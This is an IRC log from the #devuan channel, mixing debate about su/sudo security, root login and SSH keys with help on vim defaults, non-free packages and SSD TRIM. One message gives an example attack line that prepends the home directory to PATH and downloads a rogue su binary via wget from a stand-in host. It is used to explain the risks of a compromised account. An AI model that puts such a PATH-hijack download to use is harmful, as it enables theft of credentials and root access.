19:45.46 | *** join/#devuan Oldmoss (~Oldmoss@anon-42-213.vpn.ipredator.se) |
19:45.56 | DocScrutinizer05 | I hope we don't need to fork su soon since Poettering "fixed that" -- oh wait I guess he already did, "su is broken" [/quote Poettering]. |
19:51.13 | *** join/#devuan crayxmp (~crayxmp@AReims-651-1-239-87.w81-49.abo.wanadoo.fr) |
19:56.29 | bluemarlin | wait he said that? what could possibly be broken on su |
19:57.47 | DocScrutinizer05 | it doesn't switch context |
19:57.53 | DocScrutinizer05 | or whatever |
19:58.02 | DocScrutinizer05 | session |
19:59.48 | bluemarlin | lol |
20:00.14 | bluemarlin | i bet there is systemd-sudod in development |
20:00.22 | DocScrutinizer05 | already there |
20:01.43 | bluemarlin | my god, you're right https://linux.slashdot.org/story/15/08/29/1526217/systemd-absorbs-su-command-functionality |
20:05.25 | DPA | I think tools asking for passwords for switching to other users is a bad idea overall. If the user got compromised, su could have been replaced by an alias or a changed PATH in .bashrc |
20:06.54 | *** join/#devuan banshi (~banshi@85.115.248.134) |
20:08.09 | DPA | I also beleave that the user group combination is incufficant for normal non-system users. An additional user group paire would be reqiired to limit access of progroms to directories of the user who started them. |
20:09.03 | DocScrutinizer05 | the elementary MitM problem you got with every authentication |
20:11.32 | DocScrutinizer05 | I _think_ e.g. selinux (or was it app-armor) is targeting that |
20:12.39 | DPA | right, but it's incredibly complicated. I whish there were a easier solution. |
20:14.38 | detha | There isn't. su/sudo are all or nothing options, and the more fine-grained you go, the more complexity and maintenance you add. |
20:16.27 | gnarface | yea i'm pretty sure pottering's primary complaint about su is that he didn't read the manpage so he doesn't know about the "-l" option. alot of his shit is like this, basically reinvention of something based on an excuse justified by apparent lack of awareness of existing functionality |
20:16.54 | gnarface | and the fuckers at RedHat pay him a full time salary plus benefits |
20:17.17 | gnarface | when i was that age, we got fired for leading the company on a giant incompetence-based boondoggle |
20:17.24 | gnarface | sighs |
20:17.47 | bluemarlin | DPA: so what is the safe way to get root privileges without selinux? Use only login shell on tty? |
20:18.34 | DPA | bluemarlin: exactly |
20:21.06 | detha | That may work on someone's laptop, but on a remote server I like the 'PermitRootLogin no' |
20:21.12 | *** join/#devuan MickyW (~MickyW@p4FCFEDCE.dip0.t-ipconnect.de) |
20:22.34 | detha | Maybe separate ssh keys for user login and sudo, and authentication forwarding could work |
20:23.24 | DocScrutinizer05 | when you're compromised, you lost no matter what. when it's not `PATH=~:$PATH; wget http://rogue-su -O ~/su` then it's the keylogger in your terminal |
20:23.31 | *** join/#devuan Striktarn (~Striktarn@37-46-168-202.customers.ownit.se) |
20:25.24 | DocScrutinizer05 | or they stole your private keys instead of installing a keylogger. Or they did both, to get your mantra to unlock your PKs |
20:26.11 | DPA | detha: I would just only allow key based authentication. Or rename root, most login attemps are for root anyway: https://preview.danielabrecht.ch/loginfails/ |
20:27.30 | DocScrutinizer05 | umm that's s/ //g ? |
20:27.32 | detha | DPA: like the 'toor' account? neh. |
20:28.40 | DPA | DocScrutinizer05: It's all about reducing attack surface. A compromiced user should not be able to become root, any other user, or further compromise the system. |
20:28.55 | bluemarlin | nice live feed - i'd love to setup this as my xscreensaver. |
20:29.47 | DPA | detha: toor is in the list. |
20:30.50 | primalz | if they're on your system, can't they just "id 0" to see root account name |
20:30.55 | DocScrutinizer05 | DPA: well, possibly right. But I'd start at "a user must not get compromised" |
20:31.27 | detha | DPA: to actually keep a system going, root privs are needed at times. Nobody outside 'high-security environments' will deal with the hassle of opening a separate terminal/connection for that |
20:33.45 | DPA | Convinience has always been the strongest opponent of security. |
20:33.46 | DocScrutinizer05 | on that rationale nobody has password auth on any of my systems, except locally on local workstation |
20:34.37 | DocScrutinizer05 | even more convenient than typing in a password |
20:35.40 | detha | My problem is more the 'automation' accounts. Those have to either log in as root, or have passwordless full privs. |
20:36.14 | detha | And once the automation server is compromised, there goes the rest :/ |
20:37.22 | DocScrutinizer05 | mumbles "LetsEncrypt automated update of update scripts" |
20:38.45 | DocScrutinizer05 | "the rest" == 2/3 of the internet infra |
20:42.06 | buZz | DocScrutinizer05: once that worm activates, it'll be hell :P |
20:47.03 | bluemarlin | remembered this security marvel: https://krypt.co/ |
20:47.16 | Evilham | the default certbot from LE is sooo bloated |
20:47.54 | Evilham | bluemarlin: o.ô hadn't seen that... |
20:49.51 | DocScrutinizer05 | OMG! |
20:50.03 | bluemarlin | it's terrible indeed, i had a quick look into their github and there is hard-coded google analytics in it... i didn't look further. |
20:50.15 | detha | Using phones for 2fa is "not the solution". First things to get lost/stolen, and (because some banks here do it) there is a nice cottage industry around hijacking phone numbers |
20:50.30 | *** join/#devuan aitor (~aitor@36.red-81-32-10.dynamicip.rima-tde.net) |
20:51.11 | bluemarlin | but what detha says as well - it's flawed by design. Cool website though, gives people nice fake sense of security |
20:51.12 | DocScrutinizer05 | and Android is THE known secure OS for that, which never gets hijacked |
20:52.14 | aitor | i've built the installer for ascii, but running it i get something like: |
20:52.27 | aitor | can't find cpu0 node |
20:52.49 | aitor | after that, the screen blinks |
20:57.35 | *** join/#devuan JTechno (~JTechno@84.121.32.14.dyn.user.ono.com) |
21:04.20 | *** join/#devuan ltem (~ltem@h081217057026.dyn.cm.kabsi.at) |
21:05.33 | aitor | need to reboot |
21:15.48 | Lydia_K | Holy crap what is up with vim in ascii? |
21:16.04 | Lydia_K | Is this the new default debian config that we inherited? |
21:16.18 | *** join/#devuan JTechno (~JTechno@84.121.32.14.dyn.user.ono.com) |
21:17.01 | Lydia_K | Oh finally, I found the answer: set mouse-=a |
21:17.24 | parazyd | :) |
21:17.30 | parazyd | same thing happened to me today |
21:17.37 | parazyd | couldn't paste or anything haha |
21:17.55 | Lydia_K | Seriously |
21:18.05 | *** join/#devuan blitzed (~blitzed@cpe-75-80-44-59.san.res.rr.com) |
21:18.07 | Lydia_K | "Oh you wanted to have vim be able to interact with anything else? Too bad." |
21:18.22 | Lydia_K | God forbid you want to copy paste between vim and other things. |
21:18.40 | Lydia_K | That went right into my vimrc's |
21:18.41 | parazyd | haha |
21:19.06 | Lydia_K | It's not even like I'm a mouse person at all |
21:19.16 | Lydia_K | I call it "the tugboat" to make fun of how slow it is |
21:20.46 | parazyd | i managed to almost completely remove the mouse from my workflow |
21:21.04 | parazyd | using it only for scrolling and sometimes clicking on links in firefox (vimfx rocks!) |
21:21.05 | *** join/#devuan aitor (~aitor@36.red-81-32-10.dynamicip.rima-tde.net) |
21:21.06 | Striktarn | hi, why is the "non-free" section added by default to sources.list and is there any way I can check if I have installed anything "non-free"? |
21:21.34 | *** join/#devuan Chanku (~Chanku@2601:704:2:a700:21b:77ff:fea3:4a99) |
21:21.56 | aitor | now i understand: "cpuburn-udeb" is missing in ascii |
21:22.57 | fsmithred | Striktarn, you only get asked if you want non-free and contrib if you do expert install. For regular install, wireless firmware needs to be available for many people. |
21:23.07 | fsmithred | and yes, you can check... |
21:24.02 | fsmithred | dpkg-query -W --showformat='${Package}\t${Section}\n' |grep -e non-free -e contrib |
21:24.49 | *** join/#devuan friendlyex (~penistat2@24.216.245.27) |
21:25.25 | friendlyex | Anyone had luck getting the power stuff to work on a lenovo yoga 2 pro? |
21:25.33 | friendlyex | Like, suspend on lid close, etc.. |
21:28.04 | Striktarn | fsmithred, thank you. It returned these packages "libclucene-contribs1libs". But it is not listed as "non-free" at https://packages.debian.org/jessie/libs/libclucene-contribs1 |
21:31.50 | fsmithred | I have that installed automatically because of libreoffice |
21:32.44 | enyc | meows |
21:33.38 | fsmithred | Striktarn, it's a false positive because "contrib" is in the name. |
21:33.59 | matlock | friendlyex https://wiki.archlinux.org/index.php/Lenovo_Ideapad_Yoga_2_Pro |
21:34.30 | friendlyex | matlock, thanks! |
21:34.36 | friendlyex | starts a googlin' |
21:44.18 | Striktarn | fsmithred, awesome! |
21:46.27 | friendlyex | Yeah, not finding anything in here... Looks like there is some systemd related documentation, and the associated dirs... |
21:46.37 | friendlyex | But I'm sure those aren't relevant here? :D |
21:49.39 | *** join/#devuan Oldmoss (~Oldmoss@anon-42-10.vpn.ipredator.se) |
21:50.18 | *** join/#devuan gmcastil` (~user@97-122-237-94.hlrn.qwest.net) |
21:52.19 | *** join/#devuan aitor (~aitor@36.red-81-32-10.dynamicip.rima-tde.net) |
22:20.32 | DocScrutinizer05 | know your enemy ;-D |
22:21.08 | DocScrutinizer05 | if I could baer with anything systemd on my system, then that's systemd docs/manpages |
22:28.15 | *** join/#devuan friendlyex (~penistat2@24.216.245.27) |
22:44.11 | *** join/#devuan tg (~x@unaffiliated/tg) |
22:48.09 | Xenguy | Out out brief candle! |
22:49.09 | *** join/#devuan mn3monic (~xxwa@unaffiliated/mn3monic) |
22:54.15 | *** join/#devuan malinas (~user@137.132.22.252) |
22:59.49 | *** join/#devuan NewGnuGuy (~NewGnuGuy@72.34.178.39) |
23:05.57 | Striktarn | what's the appropriate way to do TRIM of a intel SSD in devuan? I cant find the "fstrim" program in the repos |
23:05.59 | *** join/#devuan aitor (~aitor@171.85-84-183.dynamic.clientes.euskaltel.es) |
23:06.21 | aitor | What does Shakespeare mean when he says, "Out out brief candle ..."? |
23:06.45 | aitor | https://www.enotes.com/homework-help/what-does-shakespeare-means-when-he-says-out-out-15237 |
23:07.48 | *** join/#devuan sorpigal (~phogg@pdpc/supporter/student/phogg) |
23:10.47 | DocScrutinizer05 | Striktarn: no idea where's fstrim, but maybe this helps anyway http://blog.neutrino.es/2013/howto-properly-activate-trim-for-your-ssd-on-linux-fstrim-lvm-and-dmcrypt/ |
23:12.06 | catprints | very cheerful.:) |
23:19.10 | NewGnuGuy | aitor: On a similar note https://www.youtube.com/watch?v=ZtA0tzVihfU :-P |
23:20.46 | aitor | lol |
23:26.12 | Xenguy | aitor: I'm not exactly sure, but I threw it in anyway ;) |
23:31.54 | *** join/#devuan Ryushin (chris@2001:470:4b:38f:527b:9dff:fe9e:37e6) |
23:32.46 | aitor | bye:) |
23:32.59 | Striktarn | DocScrutinizer05, It appears mounting with "discard" option is not recommended and the other method is using "fstrim". I wonder what happened to it, it should be a part of "util-linux" in jessie. And I have "util-linux" installed but cant find "fstrim". |